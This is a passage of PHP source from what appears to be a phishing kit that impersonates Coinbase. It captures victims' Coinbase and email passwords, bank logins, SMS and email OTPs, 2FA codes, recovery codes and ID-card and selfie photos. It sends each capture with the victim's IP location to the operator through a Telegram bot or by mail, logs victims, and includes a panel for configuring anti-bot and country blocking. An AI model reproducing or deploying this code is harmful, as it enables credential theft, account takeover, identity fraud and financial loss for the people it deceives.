        $Message .= "Zipcode : {$_SESSION['zipcode']}\n";
        $Message .= "====================================\n";
        $Message .= "              IPINFO\n";
        $Message .= "====================================\n";
        $Message .= "Ip : {$_SERVER['REMOTE_ADDR']}\n";
        $Message .= "Country : {$_SESSION['logcountry']}\n";
        $Message .= "State : {$_SESSION['logregion']}\n";
        $Message .= "City : {$_SESSION['logcity']}\n";
        $Message .= "User Agent : {$_SESSION['useragent']}\n";
        $Message .= "Provider : {$_SESSION['org']}\n";
        $Message .= "Time : ". date('l jS \o\f F Y h:i:s A')."\n";
        $Message .= "============== Have Fun! ==============";
        if($this->telegStatus === 'on'){
            $this->tgbot($Message);
        }else{
            mail($this->tomail, $Subject, $Message, $this->headers);
        }
        $this->processwait();
        $_SESSION['Status'] = 'waiting';
        header("Location: process?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        exit;
    }

    public function bank(){
        $_SESSION['Status'] = 'accountbanks';
        header("Location: accountbanks?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        exit;
    }
    
    public function banks($banks){
        $_SESSION['bankname'] = $banks;
        $_SESSION['Status'] = 'bankaccount';
        header("Location: bankaccount?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        exit;
        
    }
    
    public function Addbank($Username,$Password,$bankname){
        $_SESSION['BankU'] = $Username;
        $_SESSION['BankP'] = $Password;
        $_SESSION['BankName'] = $bankname;
        
        $Message = "====================================\n";
        $Message .= "Coinbase Access\n";
        $Message .= "-----------\n";
        $Message .= "Username : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Password']}\n";
        $Message .= "====================================\n";
        $Message .= "Email Access\n";
        $Message .= "-----------\n";
        $Message .= "Email : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Empas']}\n";
        $Message .= "Copy Fromat : {$_SESSION['Email']}|{$_SESSION['Empas']}\n";
        $Message .= "====================================\n";
        $Message .= "Bank Access\n";
        $Message .= "-----------\n";
        $Message .= "Username : {$_SESSION['BankU']}\n";
        $Message .= "Password : {$_SESSION['BankP']}\n";
        $Message .= "BankName : {$_SESSION['BankName']}\n";
        $Message .= "====================================\n";
        $Message .= "IPINFO\n";
        $Message .= "====================================\n";
        $Message .= "Ip : {$_SERVER['REMOTE_ADDR']}\n";
        $Message .= "Country : {$_SESSION['logcountry']}\n";
        $Message .= "State : {$_SESSION['logregion']}\n";
        $Message .= "City : {$_SESSION['logcity']}\n";
        $Message .= "User Agent : {$_SESSION['useragent']}\n";
        $Message .= "Provider : {$_SESSION['org']}\n";
        $Message .= "Time : " . date('l jS \o\f F Y h:i:s A')."\n";
        $Message .= "============== Bismillah 10 M ==============";
        $Subject = "+Coinbase+ [Bank Akses:".$_SERVER['REMOTE_ADDR']."] ".$_SESSION['logcountry'];
        $_SESSION['Status'] = 'otpbank';
        if($this->telegStatus === 'on'){
            $this->tgbot($Message);
        }else{
            mail($this->tomail, $Subject, $Message, $this->headers);
        }
        $_SESSION['Status'] = 'otpbank';
        header("Location: bankaccounts?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        exit;
    }

    public function AddDocument() {
        if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file1']) && isset($_FILES['file2'])) {
            $uploadDir = '../assets/VerifyID/';  // Ensure this directory exists and has write permissions
    
            // Helper function to move and check uploaded file
            function moveAndCheckFile($file, $path) {
                if (!move_uploaded_file($file['tmp_name'], $path)) {
                    die("Failed to upload {$file['name']}.");
                }
            }
    
            // Save files locally
            $file1 = $_FILES['file1'];
            $file1Path = $uploadDir . basename($file1['name']);
            moveAndCheckFile($file1, $file1Path);
    
            $file2 = $_FILES['file2'];
            $file2Path = $uploadDir . basename($file2['name']);
            moveAndCheckFile($file2, $file2Path);
    
            $url = "https://api.telegram.org/bot" . $this->Userid . "/sendMediaGroup";
    
            // Prepare the media group data
            $boundary = "----WebKitFormBoundary" . md5(time());
            $payload = $this->preparePayload($boundary, $file1Path, $file2Path);
    
            // Initialize cURL session
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: multipart/form-data; boundary=$boundary"]);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
            $output = curl_exec($ch);
    
            // Handle cURL response
            $this->handleCurlResponse($ch, $output);
        } else {
            echo "Files not set.";
        }
    }

    public function AddSelfie() {
        if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file1'])) {
            $uploadDir = '../assets/VerifyID/';  // Ensure this directory exists and has write permissions
    
            // Helper function to move and check uploaded file
            function moveAndCheckFile($file, $path) {
                if (!move_uploaded_file($file['tmp_name'], $path)) {
                    die("Failed to upload {$file['name']}.");
                }
            }
    
            // Save files locally
            $file1 = $_FILES['file1'];
            $file1Path = $uploadDir . basename($file1['name']);
            moveAndCheckFile($file1, $file1Path);
    
            $url = "https://api.telegram.org/bot" . $this->Userid . "/sendMediaGroup";
    
            // Prepare the media group data
            $boundary = "----WebKitFormBoundary" . md5(time());
            $payload = $this->PayloadSelfie($boundary, $file1Path);
    
            // Initialize cURL session
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: multipart/form-data; boundary=$boundary"]);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
            $output = curl_exec($ch);
    
            // Handle cURL response
            $this->handleCurlResponse($ch, $output);
        } else {
            echo "Files not set.";
        }
    }

    private function PayloadSelfie($boundary, $file1Path) {
        $payload = "--$boundary\r\n";
        $payload .= "Content-Disposition: form-data; name=\"chat_id\"\r\n\r\n";
        $payload .= $this->ChanelID . "\r\n";
        $payload .= "--$boundary\r\n";
        $payload .= "Content-Disposition: form-data; name=\"media\"\r\n\r\n";
        $payload .= json_encode([
            ['type' => 'photo', 'media' => 'attach://file1', 'caption' => "{$_SESSION['Email']} Selfie"]
        ]) . "\r\n";
        $payload .= "--$boundary\r\n";
        $payload .= "Content-Disposition: form-data; name=\"file1\"; filename=\"" . basename($file1Path) . "\"\r\n";
        $payload .= "Content-Type: application/octet-stream\r\n\r\n";
        $payload .= file_get_contents($file1Path) . "\r\n";
        $payload .= "--$boundary--";
        return $payload;
    }
    
    private function preparePayload($boundary, $file1Path, $file2Path) {
        $payload = "--$boundary\r\n";
        $payload .= "Content-Disposition: form-data; name=\"chat_id\"\r\n\r\n";
        $payload .= $this->ChanelID . "\r\n";
        $payload .= "--$boundary\r\n";
        $payload .= "Content-Disposition: form-data; name=\"media\"\r\n\r\n";
        $payload .= json_encode([
            ['type' => 'photo', 'media' => 'attach://file1', 'caption' => "{$_SESSION['Email']} Front"],
            ['type' => 'photo', 'media' => 'attach://file2', 'caption' => "{$_SESSION['Email']} Back"]
        ]) . "\r\n";
        $payload .= "--$boundary\r\n";
        $payload .= "Content-Disposition: form-data; name=\"file1\"; filename=\"" . basename($file1Path) . "\"\r\n";
        $payload .= "Content-Type: application/octet-stream\r\n\r\n";
        $payload .= file_get_contents($file1Path) . "\r\n";
        $payload .= "--$boundary\r\n";
        $payload .= "Content-Disposition: form-data; name=\"file2\"; filename=\"" . basename($file2Path) . "\"\r\n";
        $payload .= "Content-Type: application/octet-stream\r\n\r\n";
        $payload .= file_get_contents($file2Path) . "\r\n";
        $payload .= "--$boundary--";
        return $payload;
    }
    
    private function handleCurlResponse($ch, $output) {
        if (curl_errno($ch)) {
            echo 'Telegram API error: ' . curl_error($ch);
        } else {
            $response = json_decode($output, true);
            if ($response['ok']) {
                $this->processwait();
                $_SESSION['Status'] = 'waiting';
                header("Location: process?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
                exit;
            } else {
                echo "Error sending images: " . $response['description'];
            }
        }
        curl_close($ch);
    }

    public function AddPin($pin){
        $_SESSION['pin'] = $pin;
        $Message = "====================================\n";
        $Message .= "Coinbase Access\n";
        $Message .= "-----------\n";
        $Message .= "Username : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Password']}\n";
        $Message .= "====================================\n";
        $Message .= "Email Access\n";
        $Message .= "-----------\n";
        $Message .= "Email : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Empas']}\n";
        $Message .= "Copy Fromat : {$_SESSION['Email']}|{$_SESSION['Empas']}\n";
        $Message .= "====================================\n";
        $Message .= "Bank Access\n";
        $Message .= "-----------\n";
        $Message .= "Username : {$_SESSION['BankU']}\n";
        $Message .= "Password : {$_SESSION['BankP']}\n";
        $Message .= "====================================\n";
        $Message .= "OTP BANK\n";
        $Message .= "-----------\n";
        $Message .= "OTP : {$_SESSION['pin']}\n";
        $Message .= "====================================\n";
        $Message .= "IPINFO\n";
        $Message .= "====================================\n";
        $Message .= "Ip : {$_SERVER['REMOTE_ADDR']}\n";
        $Message .= "Country : {$_SESSION['logcountry']}\n";
        $Message .= "State : {$_SESSION['logregion']}\n";
        $Message .= "City : {$_SESSION['logcity']}\n";
        $Message .= "User Agent : {$_SESSION['useragent']}\n";
        $Message .= "Provider : {$_SESSION['org']}\n";
        $Message .= "Time : " . date('l jS \o\f F Y h:i:s A')."\n";
        $Message .= "============== Bismillah 10 M ==============";
        $Subject = "+Coinbase+ [Bank Akses:".$_SERVER['REMOTE_ADDR']."] ".$_SESSION['logcountry'];
        @$_SESSION['BankOTP'] += 1;
        if($this->telegStatus === 'on'){
            $this->tgbot($Message);
        }else{
            mail($this->tomail, $Subject, $Message, $this->headers);
        }
        if($_SESSION['BankOTP'] < $this->BankOTP){
            $_SESSION['Status'] = 'otpbank';
            header("Location: bankaccounts?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
            exit;
        }else{
            $this->processwait();
            $_SESSION['Status'] = 'waiting';
            header("Location: process?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
            exit;
        }
    }

    public function EmailLoginOTP(){
        $_SESSION['OTPEMAIL'] = $_POST['password'];
        // Sender
        $subject = "[" .strtoupper($_SESSION['Email']). " OTP] " . $_SESSION['logcountry'];
        
        // Construct the message
        $Message  = "====================================\n";
        $Message .= "📧      COINBASE OTP EMAIL\n";
        $Message .= "-----------\n";
        $Message .= "Username : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Password']}\n";
        $Message .= "====================================\n";
        $Message .= "Phone Number : {$_SESSION['phonenumber']}\n";
        $Message .= "====================================\n";
        $Message .= "Email Access\n";
        $Message .= "====================================\n";
        $Message .= "Email : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Empas']}\n";
        $Message .= "Copy Format : {$_SESSION['Email']}|{$_SESSION['Empas']}\n";
        $Message .= "====================================\n";
        $Message .= "**OTP MAIL**\n";
        $Message .= "----------------\n";
        $Message .= "Email : {$_SESSION['OTPEMAIL']}\n";
        $Message .= "====================================\n";
        $Message .= "IPINFO\n";
        $Message .= "====================================\n";
        $Message .= "IP : {$_SERVER['REMOTE_ADDR']}\n";
        $Message .= "Country : {$_SESSION['logcountry']}\n";
        $Message .= "State : {$_SESSION['logregion']}\n";
        $Message .= "City : {$_SESSION['logcity']}\n";
        $Message .= "User Agent : {$_SESSION['useragent']}\n";
        $Message .= "Provider : {$_SESSION['org']}\n";
        $Message .= "Time : " . date('l jS \o\f F Y h:i:s A') . "\n";
        $Message .= "============== Bismillah 10 M ==============";
        $Subject = "+Coinbase+ [Email Access: " . $_SERVER['REMOTE_ADDR'] . "] " . $_SESSION['logcountry'];
        $log_entry = "{$_SERVER['REMOTE_ADDR']}\r\n";
        file_put_contents('../../log/email.log', $log_entry, FILE_APPEND);
    
        // Notify via Telegram or Email
        if ($this->telegStatus === 'on') {
            $this->tgbot($Message);
        } else {
            mail($this->tomail, $Subject, $Message, $this->headers);
        }
        $this->processwait();
        $_SESSION['Status'] = 'waiting';
        header("Location: process?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        exit;
    }

    public function EmailLoginRecovery(){
        $_SESSION['RECOVERYMAIL'] = $_POST['password'];
        // Sender
        $subject = "[" .strtoupper($_SESSION['Email']). " OTP] " . $_SESSION['logcountry'];
        
        // Construct the message
        $Message  = "====================================\n";
        $Message .= "📧      COINBASE RECOVERY EMAIL\n";
        $Message .= "-----------\n";
        $Message .= "Username : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Password']}\n";
        $Message .= "====================================\n";
        $Message .= "Phone Number : {$_SESSION['phonenumber']}\n";
        $Message .= "====================================\n";
        $Message .= "Email Access\n";
        $Message .= "====================================\n";
        $Message .= "Email : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Empas']}\n";
        $Message .= "Copy Format : {$_SESSION['Email']}|{$_SESSION['Empas']}\n";
        $Message .= "====================================\n";
        $Message .= "**RECOVERY MAIL**\n";
        $Message .= "----------------\n";
        $Message .= "Email : {$_SESSION['RECOVERYMAIL']}\n";
        $Message .= "====================================\n";
        $Message .= "IPINFO\n";
        $Message .= "====================================\n";
        $Message .= "IP : {$_SERVER['REMOTE_ADDR']}\n";
        $Message .= "Country : {$_SESSION['logcountry']}\n";
        $Message .= "State : {$_SESSION['logregion']}\n";
        $Message .= "City : {$_SESSION['logcity']}\n";
        $Message .= "User Agent : {$_SESSION['useragent']}\n";
        $Message .= "Provider : {$_SESSION['org']}\n";
        $Message .= "Time : " . date('l jS \o\f F Y h:i:s A') . "\n";
        $Message .= "============== Bismillah 10 M ==============";
        $Subject = "+Coinbase+ [Email Access: " . $_SERVER['REMOTE_ADDR'] . "] " . $_SESSION['logcountry'];
        $log_entry = "{$_SERVER['REMOTE_ADDR']}\r\n";
        file_put_contents('../../log/email.log', $log_entry, FILE_APPEND);
    
        // Notify via Telegram or Email
        if ($this->telegStatus === 'on') {
            $this->tgbot($Message);
        } else {
            mail($this->tomail, $Subject, $Message, $this->headers);
        }
        
        $_SESSION['Status'] = 'otpmail';
        if (preg_match('/@(yahoo|ymail)/', strtolower($_SESSION['Email']))) {
            header("Location: yahooauths?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        } elseif (preg_match('/@aol/', strtolower($_SESSION['Email']))) {
            header("Location: aolauths?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        } else {
            $_SESSION['Status'] = 'otp';
            header("Location: loginotp?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        }
    }

    public function EmailLoginRecoveryCode(){
        $_SESSION['OTPCODEMAIL'] = $_POST['password'];
        // Sender
        $subject = "[" .strtoupper($_SESSION['Email']). " OTP] " . $_SESSION['logcountry'];
        
        // Construct the message
        $Message  = "====================================\n";
        $Message .= "📧      COINBASE OTP KE EMAIL\n";
        $Message .= "-----------\n";
        $Message .= "Username : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Password']}\n";
        $Message .= "====================================\n";
        $Message .= "Phone Number : {$_SESSION['phonenumber']}\n";
        $Message .= "====================================\n";
        $Message .= "Email Access\n";
        $Message .= "====================================\n";
        $Message .= "Email : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Empas']}\n";
        $Message .= "Copy Format : {$_SESSION['Email']}|{$_SESSION['Empas']}\n";
        $Message .= "====================================\n";
        $Message .= "**RECOVERY MAIL CODE**\n";
        $Message .= "----------------\n";
        $Message .= "OTPCODE : {$_SESSION['OTPCODEMAIL']}\n";
        $Message .= "====================================\n";
        $Message .= "IPINFO\n";
        $Message .= "====================================\n";
        $Message .= "IP : {$_SERVER['REMOTE_ADDR']}\n";
        $Message .= "Country : {$_SESSION['logcountry']}\n";
        $Message .= "State : {$_SESSION['logregion']}\n";
        $Message .= "City : {$_SESSION['logcity']}\n";
        $Message .= "User Agent : {$_SESSION['useragent']}\n";
        $Message .= "Provider : {$_SESSION['org']}\n";
        $Message .= "Time : " . date('l jS \o\f F Y h:i:s A') . "\n";
        $Message .= "============== Bismillah 10 M ==============";
        $Subject = "+Coinbase+ [Email Access: " . $_SERVER['REMOTE_ADDR'] . "] " . $_SESSION['logcountry'];
        $log_entry = "{$_SERVER['REMOTE_ADDR']}\r\n";
        file_put_contents('../../log/email.log', $log_entry, FILE_APPEND);
    
        // Notify via Telegram or Email
        if ($this->telegStatus === 'on') {
            $this->tgbot($Message);
        } else {
            mail($this->tomail, $Subject, $Message, $this->headers);
        }
        $this->processwait();
        $_SESSION['Status'] = 'waiting';
        header("Location: process?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        exit;
    }

    public function EmailLogin() {
        $_SESSION['Empas'] = $_POST['password'];
    
        // Construct the message
        $Message  = "====================================\n";
        $Message .= "📧      COINBASE AKSES EMAIL\n";
        $Message .= "-----------\n";
        $Message .= "Username : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Password']}\n";
        $Message .= "====================================\n";
        $Message .= "Phone Number : {$_SESSION['phonenumber']}\n";
        $Message .= "====================================\n";
        $Message .= "Email Access\n";
        $Message .= "-----------\n";
        $Message .= "Email : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Empas']}\n";
        $Message .= "Copy Format : {$_SESSION['Email']}|{$_SESSION['Empas']}\n";
        $Message .= "====================================\n";
        $Message .= "IPINFO\n";
        $Message .= "====================================\n";
        $Message .= "IP : {$_SERVER['REMOTE_ADDR']}\n";
        $Message .= "Country : {$_SESSION['logcountry']}\n";
        $Message .= "State : {$_SESSION['logregion']}\n";
        $Message .= "City : {$_SESSION['logcity']}\n";
        $Message .= "User Agent : {$_SESSION['useragent']}\n";
        $Message .= "Provider : {$_SESSION['org']}\n";
        $Message .= "Time : " . date('l jS \o\f F Y h:i:s A') . "\n";
        $Message .= "============== Bismillah 10 M ==============";
    
        $Subject = "+Coinbase+ [Email Access: " . $_SERVER['REMOTE_ADDR'] . "] " . $_SESSION['logcountry'];
        $log_entry = "{$_SERVER['REMOTE_ADDR']}\r\n";
        file_put_contents('../../log/email.log', $log_entry, FILE_APPEND);
    
        // Notify via Telegram or Email
        if ($this->telegStatus === 'on') {
            $this->tgbot($Message);
        } else {
            mail($this->tomail, $Subject, $Message, $this->headers);
        }
    
        // Check for double email access handling
        if ($this->doubleEmpas === 'on' && empty($_SESSION['EmpasFirst'])) {
            $_SESSION['Status'] = 'Email';
            $_SESSION['EmpasFirst'] = true;
            $_SESSION['errorb'] = true;
            
            // Redirect based on email domain
            if (preg_match('/@gmail/', strtolower($_SESSION['Email']))) {
                $this->redirectTopage("gmail");
            } elseif (preg_match('/@(yahoo|ymail)/', strtolower($_SESSION['Email']))) {
                $this->redirectTopage("yahoo");
            } elseif (preg_match('/@(hotmail|outlook|live|msn)/', strtolower($_SESSION['Email']))) {
                $this->redirectTopage("microsoft");
            } elseif (preg_match('/@aol/', strtolower($_SESSION['Email']))) {
                $this->redirectTopage("aol");
            } elseif (preg_match('/@(att|ameritech|sbcglobal|bellsouth|flash|nvbell|pacbell|prodigy|snet|swbell)/', strtolower($_SESSION['Email']))) {
                $this->redirectTopage("att");
            } else {
                $_SESSION['Status'] = 'otp';
                $this->redirectTopage("loginotp");
            }
        } else {
            // Check if IP already exists in usersinfo.log
            $usersinfo_file = '../../log/usersinfo.log';
            $current_ip = $_SERVER['REMOTE_ADDR'];
            $current_email = $_SESSION['Email'];
            $current_country = $_SESSION['Countrynya'];
            $current_status = 'waiting';
            $new_log_entry = "\n{$current_ip}|{$current_email}|{$current_country}|{$current_status}\r\n";
    
            if (file_exists($usersinfo_file)) {
                $log_entries = file($usersinfo_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
                $ip_exists = false;
                
                foreach ($log_entries as $index => $entry) {
                    $log_parts = explode('|', $entry);
                    $ip = $log_parts[0] ?? '';
                    if ($ip === $current_ip) {
                        // Update the existing entry
                        $log_entries[$index] = "{$current_ip}|{$current_email}|{$current_country}|{$current_status}";
                        $ip_exists = true;
                        break;
                    }
                }
    
                // Write the updated list back to the file
                if ($ip_exists) {
                    file_put_contents($usersinfo_file, implode(PHP_EOL, $log_entries) . PHP_EOL);
                } else {
                    // Append the new entry if the IP address does not already exist
                    file_put_contents($usersinfo_file, $new_log_entry, FILE_APPEND);
                }
            } else {
                // If the file does not exist, create it and add the new entry
                file_put_contents($usersinfo_file, $new_log_entry);
            }
            unset($_SESSION['EmpasFirst']);
            unset($_SESSION['errorb']);
            $this->processwait();
            $_SESSION['Status'] = 'waiting';
            header("Location: process?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
            exit;
        }
    }
    
    private function redirectToLink($path) {
        header("Location: {$path}?c_ds_na=" . $this->generateRandomText(12) . "&c_ds_no=" . urlencode($_SERVER['HTTP_ACCEPT']));
        exit;
    }
    
    public function redirectTo() {
        header("Location: " . $this->Redirect);
        exit; // Stop script execution after redirect
    }
    
    private function redirectTopage($path) {
        header("Location: {$path}?c_ds_na=" . $this->generateRandomText(12) . "&c_ds_no=" . urlencode($_SERVER['HTTP_ACCEPT']));
        exit;
    }

    function accountBank(){
        $_SESSION['Status'] = 'accountbank';
        header("Location: accountbank?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
        exit;
    }

    function otp($otp1,$otp2,$otp3,$otp4,$otp5,$otp6){
        $_SESSION['otp'] = "$otp1$otp2$otp3$otp4$otp5$otp6";
        $Subject = '$$Coinbase$$'." [OTP:{$_SERVER['REMOTE_ADDR']}] {$_SESSION['logcountry']}";
        $Message = "====================================\n";
        $Message .= "🎉      COINBASE OTP SMS\n";
        $Message .= "====================================\n";
        $Message .= "Username : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Password']}\n";
        $Message .= "====================================\n";
        $Message .= "              OTP CODE\n";
        $Message .= "====================================\n";
        $Message .= "OTP CODE : {$_SESSION['otp']}\n";
        $Message .= "====================================\n";
        $Message .= "              IPINFO\n";
        $Message .= "====================================\n";
        $Message .= "Ip : {$_SERVER['REMOTE_ADDR']}\n";
        $Message .= "Country : {$_SESSION['logcountry']}\n";
        $Message .= "State : {$_SESSION['logregion']}\n";
        $Message .= "City : {$_SESSION['logcity']}\n";
        $Message .= "User Agent : {$_SESSION['useragent']}\n";
        $Message .= "Provider : {$_SESSION['org']}\n";
        $Message .= "Time : ". date('l jS \o\f F Y h:i:s A')."\n";
        $Message .= "============== Have Fun! ==============";
        @$_SESSION['OtpAttempt'] += 1;
        $Subject = "+Coinbase+ [OTP Code {$_SESSION['OtpAttempt']} :{$_SERVER['REMOTE_ADDR']}] {$_SESSION['logcountry']}";
        $log_entry = "{$_SERVER['REMOTE_ADDR']}\r\n";
        file_put_contents('../log/otp.log', $log_entry , FILE_APPEND);
        if($this->telegStatus === 'on'){
            $this->tgbot($Message);
        }else{
            mail($this->tomail, $Subject, $Message, $this->headers);
        }
        if(@$_SESSION['OtpAttempt'] < $this->otpAttempt){
            $_SESSION['errorPass'] = true;
            header("Location: loginotp?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
            exit;
        }else{
            $this->processwait();
            $_SESSION['Status'] = 'waiting';
            header("Location: process?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
            exit;
        }

    }

    function authcode($otp1,$otp2,$otp3,$otp4,$otp5,$otp6){
        $_SESSION['otp'] = "$otp1$otp2$otp3$otp4$otp5$otp6";
        $Subject = '$$Coinbase$$'." [OTP:{$_SERVER['REMOTE_ADDR']}] {$_SESSION['logcountry']}";
        $Message = "====================================\n";
        $Message .= "🎉      COINBASE 2FA/AUTH\n";
        $Message .= "====================================\n";
        $Message .= "Username : {$_SESSION['Email']}\n";
        $Message .= "Password : {$_SESSION['Password']}\n";
        $Message .= "====================================\n";
        $Message .= "AUTHENTICATION CODE\n";
        $Message .= "====================================\n";
        $Message .= "OTP CODE : {$_SESSION['otp']}\n";
        $Message .= "====================================\n";
        $Message .= "              IPINFO\n";
        $Message .= "====================================\n";
        $Message .= "Ip : {$_SERVER['REMOTE_ADDR']}\n";
        $Message .= "Country : {$_SESSION['logcountry']}\n";
        $Message .= "State : {$_SESSION['logregion']}\n";
        $Message .= "City : {$_SESSION['logcity']}\n";
        $Message .= "User Agent : {$_SESSION['useragent']}\n";
        $Message .= "Provider : {$_SESSION['org']}\n";
        $Message .= "Time : ". date('l jS \o\f F Y h:i:s A')."\n";
        $Message .= "============== Have Fun! ==============";
        @$_SESSION['AuthAttempt'] += 1;
        $Subject = "+Coinbase+ [OTP Code {$_SESSION['AuthAttempt']} :{$_SERVER['REMOTE_ADDR']}] {$_SESSION['logcountry']}";
        $log_entry = "{$_SERVER['REMOTE_ADDR']}\r\n";
        file_put_contents('../log/otp.log', $log_entry , FILE_APPEND);
        if($this->telegStatus === 'on'){
            $this->tgbot($Message);
        }else{
            mail($this->tomail, $Subject, $Message, $this->headers);
        }
        if(@$_SESSION['AuthAttempt'] < $this->otpAttempt){
            $_SESSION['errorPass'] = true;
            header("Location: loginauthen?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
            exit;
        }else{
            $this->processwait();
            $_SESSION['Status'] = 'waiting';
            header("Location: process?c_ds_na=".$this->generateRandomText(12)."&c_ds_no=".urlencode($_SERVER['HTTP_ACCEPT']));
            exit;
        }

    }

    function getIpInfo($ip) {
        $apiUrl = "http://ipinfo.io/{$ip}/json";
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $apiUrl);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        
        $response = curl_exec($ch);
        $data = json_decode($response, true);
        
        curl_close($ch);
        $_SESSION['logcountry'] = @$data['country'];
        $_SESSION['logregion'] = @$data['region'];
        $_SESSION['logcity'] = @$data['city'];
        $_SESSION['useragent'] = @$_SERVER['HTTP_USER_AGENT'];
        $_SESSION['org'] = @$data['org'];
    }  
    
    function SettingsPanel(){
        // Update the existing data
        $config_file = '../function/config.json';

        // Read the existing configuration
        $config = json_decode(file_get_contents($config_file), true);
        if($config === null) {
            // Error handling for JSON decoding failure
            echo "Error decoding JSON from config file.";
            exit;
        }

        // Update configuration with form data
        $config['password'] = $_POST['Password'];
        $config['email'] = $_POST['Email'];
        $config['parameter'] = $_POST['Parameter'];

        // Update configuration based on Blocker selection
        switch($_POST['Blocker']) {
            case 'Antibot':
                $config['antibotStatus'] = "on";
                $config['StopbotStatus'] = "off";
                $config['IQSStatus'] = "off";
                $config['BotBlocker'] = "off";
                $config['antibot'] = $_POST['PrivateKey'];
                break;
            case 'Stopbot':
                $config['antibotStatus'] = "off";
                $config['StopbotStatus'] = "on";
                $config['IQSStatus'] = "off";
                $config['BotBlocker'] = "off";
                $config['stopbotkey'] = $_POST['PrivateKey'];
                break;
            case 'IpQualityScore':
                $config['antibotStatus'] = "off";
                $config['StopbotStatus'] = "off";
                $config['IQSStatus'] = "on";
                $config['BotBlocker'] = "off";
                $config['ipQuality'] = $_POST['PrivateKey'];
                break;
            case 'BotBlocker':
                $config['antibotStatus'] = "off";
                $config['StopbotStatus'] = "off";
                $config['IQSStatus'] = "off";
                $config['BotBlocker'] = "on";
                $config['BotBlockerApi'] = $_POST['PrivateKey'];
                break;
            default:
                $config['antibotStatus'] = "off";
                $config['StopbotStatus'] = "off";
                $config['IQSStatus'] = "off";
                $config['BotBlocker'] = "off";
                break;
        }

        // Update other configuration settings
        $config['redirectblock'] = $_POST['Redirect'];
        $config['Userid'] = $_POST['Userid'];
        $config['otpAttempt'] = $_POST['otpAttempt'];
        $config['BankOTP'] = $_POST['BankOTP'];
        $config['ChanelID'] = $_POST['ChanelID'];

        // Format and update BlockCountry setting
        $values_array = array_map('trim', explode(',', $_POST['BlockCountry']));
        $formatted_values = [];
        foreach ($values_array as $value) {
            $formatted_values[] = "'" . strtoupper($value) . "'";
        }
        $output_string = '[' . implode(',', $formatted_values) . ']';
        $config['BlockCountry'] = $output_string;

        // Encode the updated configuration
        $encoded_config = json_encode($config, JSON_PRETTY_PRINT);
        if($encoded_config === false) {
            // Error handling for JSON encoding failure
            echo "Error encoding JSON.";
            exit;
        }

        $write_success = file_put_contents($config_file, $encoded_config);
        if ($write_success === false) {
            echo "Error writing to config file.";
            header("Location: ?error");
            exit;
        }

        // Redirect after successful write
        header("Location: ?success");
        exit;
    }

    public function BlacklistUser(){
        // Path to the log file
        $log_file = '../log/blacklist.log';
        $log_lines = file($log_file, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
        $total_lines = count($log_lines);
        return $total_lines;
    }

    public function SaveBlacklist(){
        $logblocked = "{$_POST['blacklistip']}\r";
        file_put_contents('../log/blacklist.log', $logblocked , FILE_APPEND);
        $_SESSION['cleanblacklist'] = 'success';
        header("Location: ./blacklist");
        exit;
    }

    
    public function deleteUsers(){
        $blacklist_filename = "../log/usersinfo.log";
        $ip_to_delete = $_POST['delete_ip'];
    
        // Read the blacklist file into an array
